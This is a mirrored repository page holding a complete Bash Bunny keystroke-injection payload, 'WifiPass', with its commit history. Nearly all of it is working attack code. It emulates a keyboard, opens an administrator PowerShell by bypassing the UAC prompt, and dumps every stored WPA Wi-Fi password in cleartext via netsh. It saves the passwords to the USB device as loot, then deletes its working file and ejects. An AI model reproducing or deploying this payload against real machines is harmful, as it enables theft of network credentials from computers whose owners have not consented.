mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
4e55aae0ac
* WifiPass payload Based on the WiFiCreds payload, with a focus on WPA networks and wider OS scope. * Lights Solid rather than blinking * Extra comment * Update payload.txt * Create readme.md * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md
104 lines
2.4 KiB
Bash
104 lines
2.4 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: WifiPass
|
|
# Author: TheRoninRunner
|
|
# Props: illwill
|
|
# Version: 1.0
|
|
# Target: Windows
|
|
#
|
|
# Uses the power of netsh to get a list of all wifi networks and passwords
|
|
# stored on the computer. Windows 7 has some weird formatting issues with the
|
|
# loot file.
|
|
#
|
|
# Tested and working on Windows 7, 8.1, and 10.
|
|
#
|
|
# Goes through the netsh wlan show profiles and runs each with key=clear,
|
|
# saving any networks/keys that aren't open or WEP. For any network that
|
|
# users username and password to log in, you'll get the network name only.
|
|
#
|
|
# Blue --- Setup
|
|
# Yellow --- Using networks.txt to run through the networks
|
|
# White --- Clean up
|
|
# Green --- Done
|
|
#
|
|
|
|
LED B
|
|
|
|
#Creates the loot directory
|
|
mkdir -p /root/udisk/loot/WifiPass
|
|
|
|
#Set up the Bash Bunny and get the networks and computer name
|
|
ATTACKMODE HID STORAGE
|
|
Q DELAY 2000
|
|
Q GUI
|
|
Q DELAY 500
|
|
Q STRING powershell
|
|
Q DELAY 2000
|
|
Q CTRL-SHIFT ENTER
|
|
Q DELAY 2000
|
|
Q LEFTARROW
|
|
Q DELAY 200
|
|
Q ENTER
|
|
Q DELAY 1200
|
|
Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING \$compname \= \(\$env\:computername\)
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\)
|
|
Q ENTER
|
|
Q DELAY 100
|
|
|
|
#Types out commands to get the Wifi names and passwords, as well as store them
|
|
LED Y
|
|
Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\)
|
|
Q ENTER
|
|
Q STRING foreach \(\$line in \$lines\) \{
|
|
Q ENTER
|
|
Q STRING \$fields \= \$line -split \'\: \'
|
|
Q ENTER
|
|
Q STRING \$names \= \$fields\[1\]
|
|
Q ENTER
|
|
Q STRING foreach \(\$name in \$names\)\{
|
|
Q ENTER
|
|
Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key
|
|
Q ENTER
|
|
Q STRING \$pass \= \$passwd -split \'\: \'
|
|
Q ENTER
|
|
Q STRING if \(-Not \(\$pass -eq \1\)\) \{
|
|
Q ENTER
|
|
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name
|
|
Q ENTER
|
|
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\]
|
|
Q ENTER
|
|
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n
|
|
Q ENTER
|
|
Q STRING }
|
|
Q ENTER
|
|
Q STRING }
|
|
Q ENTER
|
|
Q STRING }
|
|
Q ENTER
|
|
Q ENTER
|
|
Q DELAY 10000
|
|
|
|
# Eject the USB Safely and remove networks file
|
|
LED W
|
|
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\)
|
|
Q ENTER
|
|
Q DELAY 100
|
|
|
|
# GTFO
|
|
Q STRING EXIT
|
|
Q ENTER
|
|
#Sync Drive
|
|
sync
|
|
rm -f /root/udisk/loot/WifiPass/networks.txt
|
|
|
|
#Trap is clean
|
|
LED G
|